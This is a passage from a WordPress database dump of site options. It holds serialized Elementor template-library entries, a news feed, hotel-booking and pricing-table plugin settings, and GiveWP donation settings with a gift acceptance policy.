18\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_2.png\";s:12:\"tmpl_created\";i:1520520548;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-18/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:374;s:16:\"popularity_index\";i:457;s:11:\"trend_index\";i:780;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:800;a:16:{s:4:\"tmpl\";i:579;s:2:\"id\";i:4863;s:5:\"title\";s:14:\"Testimonial 19\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_3.png\";s:12:\"tmpl_created\";i:1520520551;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-19/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:375;s:16:\"popularity_index\";i:245;s:11:\"trend_index\";i:599;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:801;a:16:{s:4:\"tmpl\";i:581;s:2:\"id\";i:4880;s:5:\"title\";s:14:\"Testimonial 20\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/customers-1.jpg\";s:12:\"tmpl_created\";i:1520520554;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-20/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:376;s:16:\"popularity_index\";i:446;s:11:\"trend_index\";i:653;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:802;a:16:{s:4:\"tmpl\";i:583;s:2:\"id\";i:4897;s:5:\"title\";s:14:\"Testimonial 21\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_5.png\";s:12:\"tmpl_created\";i:1520520557;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-21/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:377;s:16:\"popularity_index\";i:78;s:11:\"trend_index\";i:289;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:803;a:16:{s:4:\"tmpl\";i:584;s:2:\"id\";i:4905;s:5:\"title\";s:14:\"Testimonial 22\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_6.png\";s:12:\"tmpl_created\";i:1520520559;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-22/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:378;s:16:\"popularity_index\";i:121;s:11:\"trend_index\";i:221;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:804;a:16:{s:4:\"tmpl\";i:585;s:2:\"id\";i:4913;s:5:\"title\";s:14:\"Testimonial 23\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_7.png\";s:12:\"tmpl_created\";i:1520520561;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-23/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:379;s:16:\"popularity_index\";i:247;s:11:\"trend_index\";i:566;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:805;a:16:{s:4:\"tmpl\";i:575;s:2:\"id\";i:4826;s:5:\"title\";s:14:\"Testimonial 24\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_1.png\";s:12:\"tmpl_created\";i:1520520544;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/testimonial-24-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:380;s:16:\"popularity_index\";i:256;s:11:\"trend_index\";i:395;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:806;a:16:{s:4:\"tmpl\";i:587;s:2:\"id\";i:4929;s:5:\"title\";s:14:\"Testimonial 24\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_8.png\";s:12:\"tmpl_created\";i:1520520564;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-24/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:381;s:16:\"popularity_index\";i:49;s:11:\"trend_index\";i:206;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:807;a:16:{s:4:\"tmpl\";i:591;s:2:\"id\";i:4963;s:5:\"title\";s:14:\"Testimonial 25\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_10.png\";s:12:\"tmpl_created\";i:1520520570;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/testimonial-25-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:382;s:16:\"popularity_index\";i:417;s:11:\"trend_index\";i:546;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:808;a:16:{s:4:\"tmpl\";i:592;s:2:\"id\";i:4971;s:5:\"title\";s:14:\"Testimonial 26\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_11.png\";s:12:\"tmpl_created\";i:1520520572;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-26/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:383;s:16:\"popularity_index\";i:649;s:11:\"trend_index\";i:718;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:809;a:16:{s:4:\"tmpl\";i:589;s:2:\"id\";i:4947;s:5:\"title\";s:14:\"Testimonial 27\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_9.png\";s:12:\"tmpl_created\";i:1520520567;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-27/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:384;s:16:\"popularity_index\";i:221;s:11:\"trend_index\";i:496;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:810;a:16:{s:4:\"tmpl\";i:590;s:2:\"id\";i:4955;s:5:\"title\";s:14:\"Testimonial 29\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_9.png\";s:12:\"tmpl_created\";i:1520520569;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-29/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:385;s:16:\"popularity_index\";i:378;s:11:\"trend_index\";i:695;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:811;a:16:{s:4:\"tmpl\";i:588;s:2:\"id\";i:4939;s:5:\"title\";s:13:\"Testimonial 9\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_8.png\";s:12:\"tmpl_created\";i:1520520565;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/testimonial-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:386;s:16:\"popularity_index\";i:103;s:11:\"trend_index\";i:341;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:812;a:16:{s:4:\"tmpl\";i:928;s:2:\"id\";i:12509;s:5:\"title\";s:18:\"Travel &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2019/12/404.png\";s:12:\"tmpl_created\";i:1575960378;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/travel-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:24:\"[\"404\",\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:387;s:16:\"popularity_index\";i:747;s:11:\"trend_index\";i:712;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:813;a:16:{s:4:\"tmpl\";i:929;s:2:\"id\";i:12516;s:5:\"title\";s:27:\"Travel &#8211; Archive Blog\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2019/12/Archiv_s.png\";s:12:\"tmpl_created\";i:1575960387;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/travel-archive-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:18:\"[\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:388;s:16:\"popularity_index\";i:496;s:11:\"trend_index\";i:487;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:814;a:16:{s:4:\"tmpl\";i:927;s:2:\"id\";i:12500;s:5:\"title\";s:21:\"Travel &#8211; Header\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-travel-and-tours.png\";s:12:\"tmpl_created\";i:1575960371;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/travel-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:27:\"[\"Header\",\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:389;s:16:\"popularity_index\";i:443;s:11:\"trend_index\";i:434;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:815;a:16:{s:4:\"tmpl\";i:930;s:2:\"id\";i:12524;s:5:\"title\";s:26:\"Travel &#8211; Single Post\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/12/Single_Post_s.png\";s:12:\"tmpl_created\";i:1575960397;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/travel-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:18:\"[\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:390;s:16:\"popularity_index\";i:591;s:11:\"trend_index\";i:663;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:816;a:16:{s:4:\"tmpl\";i:931;s:2:\"id\";i:12531;s:5:\"title\";s:31:\"Travel &#8211; Single Post Tour\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/12/Single_Tour_s.png\";s:12:\"tmpl_created\";i:1575960404;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/blocks/travel-single-post-tour/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:18:\"[\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:391;s:16:\"popularity_index\";i:630;s:11:\"trend_index\";i:548;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:817;a:16:{s:4:\"tmpl\";i:926;s:2:\"id\";i:12492;s:5:\"title\";s:14:\"Travel -Footer\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2019/12/Footer_s.png\";s:12:\"tmpl_created\";i:1575960358;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/travel-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:27:\"[\"Footer\",\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:392;s:16:\"popularity_index\";i:453;s:11:\"trend_index\";i:322;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:818;a:16:{s:4:\"tmpl\";i:1068;s:2:\"id\";i:15498;s:5:\"title\";s:23:\"Travel Blog &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/11/404.jpg\";s:12:\"tmpl_created\";i:1606215636;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/travel-blog-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:23:\"[\"404\",\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:393;s:16:\"popularity_index\";i:749;s:11:\"trend_index\";i:759;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:819;a:16:{s:4:\"tmpl\";i:1069;s:2:\"id\";i:15508;s:5:\"title\";s:29:\"Travel Blog &#8211; Archive 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2020/11/Archive-1-350.jpg\";s:12:\"tmpl_created\";i:1606215649;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/blocks/travel-blog-archive-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:394;s:16:\"popularity_index\";i:659;s:11:\"trend_index\";i:468;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:820;a:16:{s:4:\"tmpl\";i:1070;s:2:\"id\";i:15518;s:5:\"title\";s:29:\"Travel Blog &#8211; Archive 2\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2020/11/Archive-2-350-Copy.jpg\";s:12:\"tmpl_created\";i:1606215663;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/blocks/travel-blog-archive-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:395;s:16:\"popularity_index\";i:688;s:11:\"trend_index\";i:431;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:821;a:16:{s:4:\"tmpl\";i:1071;s:2:\"id\";i:15528;s:5:\"title\";s:26:\"Travel Blog &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/11/Footer.jpg\";s:12:\"tmpl_created\";i:1606215673;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/travel-blog-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:26:\"[\"Blog\",\"Footer\",\"Travel\"]\";s:10:\"menu_order\";i:396;s:16:\"popularity_index\";i:656;s:11:\"trend_index\";i:377;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:822;a:16:{s:4:\"tmpl\";i:1067;s:2:\"id\";i:15536;s:5:\"title\";s:26:\"Travel Blog &#8211; Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/11/Header.jpg\";s:12:\"tmpl_created\";i:1606215625;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/travel-blog-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:26:\"[\"Blog\",\"Header\",\"Travel\"]\";s:10:\"menu_order\";i:397;s:16:\"popularity_index\";i:584;s:11:\"trend_index\";i:228;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:823;a:16:{s:4:\"tmpl\";i:1072;s:2:\"id\";i:15545;s:5:\"title\";s:33:\"Travel Blog &#8211; Single Post 1\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/11/Single-1-350.jpg\";s:12:\"tmpl_created\";i:1606215684;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/blocks/travel-blog-single-post-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:398;s:16:\"popularity_index\";i:669;s:11:\"trend_index\";i:482;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:824;a:16:{s:4:\"tmpl\";i:1066;s:2:\"id\";i:15556;s:5:\"title\";s:33:\"Travel Blog &#8211; Single Post 2\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/11/Single-2-350.jpg\";s:12:\"tmpl_created\";i:1606215613;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/blocks/travel-blog-single-post-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:399;s:16:\"popularity_index\";i:652;s:11:\"trend_index\";i:454;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}}}','no'),
(225,'elementor_remote_info_feed_data','a:3:{i:0;a:5:{s:5:\"title\";s:47:\"The Complete Guide To Design Project Management\";s:7:\"excerpt\";s:347:\"Successful web creators understand that design and systems must work side by side for people to deliver high-quality work without burning out. In this guide, we will explore the practical steps you can take to shut down time-wasting activities and frustration. Say no to scope creep and build a no-fail framework that can pivot for the unexpected.\";s:7:\"created\";i:1655196509;s:5:\"badge\";s:0:\"\";s:3:\"url\";s:131:\"https://elementor.com/blog/design-project-management-guide/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:1;a:5:{s:5:\"title\";s:30:\"Elementor Websites of May 2022\";s:7:\"excerpt\";s:315:\"May’s marvelous showcase offers a taste of new design trends and reimagined retro themes that will activate your artistic mind. Hear the sound of music festivals, awaken the entrepreneurial spirit, rediscover the joy of childhood learning, glide through skateparks, and rejuvenate with a splash of the Aegean Sea.\";s:7:\"created\";i:1655101192;s:5:\"badge\";s:0:\"\";s:3:\"url\";s:117:\"https://elementor.com/blog/showcase-may-2022/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:2;a:5:{s:5:\"title\";s:53:\"5 Expert Tips To Improve Your Workflow With Elementor\";s:7:\"excerpt\";s:294:\"Our team of Elementor experts got together and came up with a list of features that will improve your workflow and make Elementor even easier to use. In this article, we’ll take a look at where you can access these features and provide you with tips on how to use them the way the experts do.\";s:7:\"created\";i:1654757528;s:5:\"badge\";s:0:\"\";s:3:\"url\";s:124:\"https://elementor.com/blog/tips-to-improve-workflow/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}}','no'),
(234,'mphb_custom_roles_version','3','yes'),
(235,'mphb_db_version','4.4.2','yes'),
(236,'tp_twitter_global_notification','1','yes'),
(238,'mphb_registered_attributes','a:0:{}','yes'),
(239,'widget_tp_widget_recent_tweets','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(240,'widget_mphb_rooms_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(241,'widget_mphb_search_availability_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(242,'go_pricing_table_settings','a:2:{s:5:\"admin\";a:2:{s:4:\"ajax\";i:1;s:10:\"capability\";s:14:\"manage_options\";}s:8:\"currency\";a:1:{i:0;a:5:{s:8:\"currency\";s:3:\"USD\";s:8:\"position\";s:4:\"left\";s:12:\"thousand-sep\";s:1:\",\";s:11:\"decimal-sep\";s:1:\".\";s:10:\"decimal-no\";i:2;}}}','yes'),
(243,'go_pricing_version','a:1:{s:6:\"plugin\";s:3:\"3.4\";}','yes'),
(246,'mphb_passed_notices','a:2:{i:0;s:13:\"force_upgrade\";i:1;s:29:\"update_confirmation_endpoints\";}','yes'),
(253,'_elementor_settings_update_time','1664833153','yes'),
(254,'elementor_cpt_support','a:2:{i:0;s:4:\"post\";i:1;s:4:\"page\";}','yes'),
(255,'elementor_disable_color_schemes','','yes'),
(256,'elementor_disable_typography_schemes','','yes'),
(257,'elementor_allow_tracking','no','yes'),
(258,'elementor_google_maps_api_key','','yes'),
(259,'elementor_css_print_method','external','yes'),
(260,'elementor_editor_break_lines','','yes'),
(261,'elementor_unfiltered_files_upload','','yes'),
(262,'elementor_font_display','auto','yes'),
(263,'elementor_load_fa4_shim','','yes'),
(264,'elementor_experiment-e_optimized_css_loading','default','yes'),
(265,'elementor_experiment-e_font_icon_svg','default','yes'),
(266,'elementor_experiment-container','default','yes'),
(267,'elementor_experiment-e_dom_optimization','default','yes'),
(268,'elementor_experiment-e_optimized_assets_loading','default','yes'),
(269,'elementor_experiment-a11y_improvements','default','yes'),
(270,'elementor_experiment-additional_custom_breakpoints','default','yes'),
(271,'elementor_experiment-e_import_export','default','yes'),
(272,'elementor_experiment-e_hidden_wordpress_widgets','default','yes'),
(273,'elementor_experiment-landing-pages','default','yes'),
(274,'elementor_experiment-elements-color-picker','default','yes'),
(275,'elementor_experiment-favorite-widgets','default','yes'),
(276,'elementor_experiment-admin-top-bar','default','yes'),
(286,'mphb_search_results_page','10','yes'),
(287,'mphb_booking_cancellation_page','11','yes'),
(288,'mphb_checkout_page','12','yes'),
(289,'mphb_booking_confirmation_page','13','yes'),
(290,'mphb_user_cancel_redirect_page','14','yes'),
(291,'mphb_payment_success_page','15','yes'),
(292,'mphb_payment_failed_page','16','yes'),
(293,'mphb_my_account_page','17','yes'),
(294,'mphb_wizard_passed','1','yes'),
(301,'recently_activated','a:0:{}','yes'),
(310,'give_settings','a:53:{s:12:\"base_country\";s:2:\"US\";s:9:\"test_mode\";s:7:\"enabled\";s:8:\"currency\";s:3:\"USD\";s:17:\"currency_position\";s:6:\"before\";s:16:\"session_lifetime\";s:6:\"604800\";s:12:\"email_access\";s:7:\"enabled\";s:19:\"thousands_separator\";s:1:\",\";s:17:\"decimal_separator\";s:1:\".\";s:15:\"number_decimals\";i:2;s:26:\"sequential-ordering_status\";s:7:\"enabled\";s:3:\"css\";s:7:\"enabled\";s:11:\"floatlabels\";s:8:\"disabled\";s:13:\"company_field\";s:8:\"disabled\";s:17:\"name_title_prefix\";s:8:\"disabled\";s:14:\"forms_singular\";s:7:\"enabled\";s:14:\"forms_archives\";s:7:\"enabled\";s:13:\"forms_excerpt\";s:7:\"enabled\";s:17:\"form_featured_img\";s:7:\"enabled\";s:12:\"form_sidebar\";s:7:\"enabled\";s:10:\"categories\";s:8:\"disabled\";s:4:\"tags\";s:8:\"disabled\";s:5:\"terms\";s:8:\"disabled\";s:13:\"admin_notices\";s:7:\"enabled\";s:5:\"cache\";s:7:\"enabled\";s:19:\"uninstall_on_delete\";s:8:\"disabled\";s:18:\"the_content_filter\";s:7:\"enabled\";s:14:\"scripts_footer\";s:8:\"disabled\";s:20:\"agree_to_terms_label\";s:15:\"Agree to Terms?\";s:14:\"agreement_text\";s:1899:\"<p>Acceptance of any contribution, gift or grant is at the discretion of the Gsw2023. The  Gsw2023 will not accept any gift unless it can be used or expended consistently with the purpose and mission of the  Gsw2023.</p>\n				<p>No irrevocable gift, whether outright or life-income in character, will be accepted if under any reasonable set of circumstances the gift would jeopardize the donor’s financial security.</p>\n				<p>The Gsw2023 will refrain from providing advice about the tax or other treatment of gifts and will encourage donors to seek guidance from their own professional advisers to assist them in the process of making their donation.</p>\n				<p>The Gsw2023 will accept donations of cash or publicly traded securities. Gifts of in-kind services will be accepted at the discretion of the Gsw2023.</p>\n				<p>Certain other gifts, real property, personal property, in-kind gifts, non-liquid securities, and contributions whose sources are not transparent or whose use is restricted in some manner, must be reviewed prior to acceptance due to the special obligations raised or liabilities they may pose for Gsw2023.</p>\n				<p>The Gsw2023 will provide acknowledgments to donors meeting tax requirements for property received by the charity as a gift. However, except for gifts of cash and publicly traded securities, no value shall be ascribed to any receipt or other form of substantiation of a gift received by Gsw2023.</p>\n				<p>The Gsw2023 will respect the intent of the donor relating to gifts for restricted purposes and those relating to the desire to remain anonymous. With respect to anonymous gifts, the Gsw2023 will restrict information about the donor to only those staff members with a need to know.</p>\n				<p>The Gsw2023 will not compensate, whether through commissions, finders\' fees, or other means, any third party for directing a gift or a donor to the Gsw2023.</p>\";s:21:\"babel_polyfill_script\";s:7:\"enabled\";s:8:\"gateways\";a:2:{s:6:\"manual\";i:1;s:7:\"offline\";i:1;}s:15:\"default_gateway\";s:6:\"manual\";s:31:\"global_offline_donation_content\";s:331:\"<p>To make an offline donation toward this cause, follow these steps: </p><ol><li>Write a check payable to \"{sitename}\"</li><li>On the memo line of the check, indicate that the donation is for \"{sitename}\"</li><li>Mail your check to:</li></ol>{offline_mailing_address}<br><p>Your tax-deductible donation is greatly appreciated!</p>\";s:43:\"give_offline_donation_enable_billing_fields\";s:8:\"disabled\";s:23:\"donor_default_user_role\";s:10:\"give_donor\";s:20:\"form_page_url_prefix\";s:4:\"give\";s:29:\"_give_stripe_get_all_accounts\";a:0:{}s:18:\"setup_page_enabled\";s:7:\"enabled\";s:14:\"usage_tracking\";s:8:\"disabled\";s:26:\"sequential-ordering_number\";i:1;s:42:\"offline-donation-instruction_email_message\";s:331:\"<p>To make an offline donation toward this cause, follow these steps: </p><ol><li>Write a check payable to \"{sitename}\"</li><li>On the memo line of the check, indicate that the donation is for \"{sitename}\"</li><li>Mail your check to:</li></ol>{offline_mailing_address}<br><p>Your tax-deductible donation is greatly appreciated!</p>\";s:30:\"donation-receipt_email_message\";s:394:\"Dear {name},\n\nThank you for your donation. Your generosity is appreciated! Here are the details of 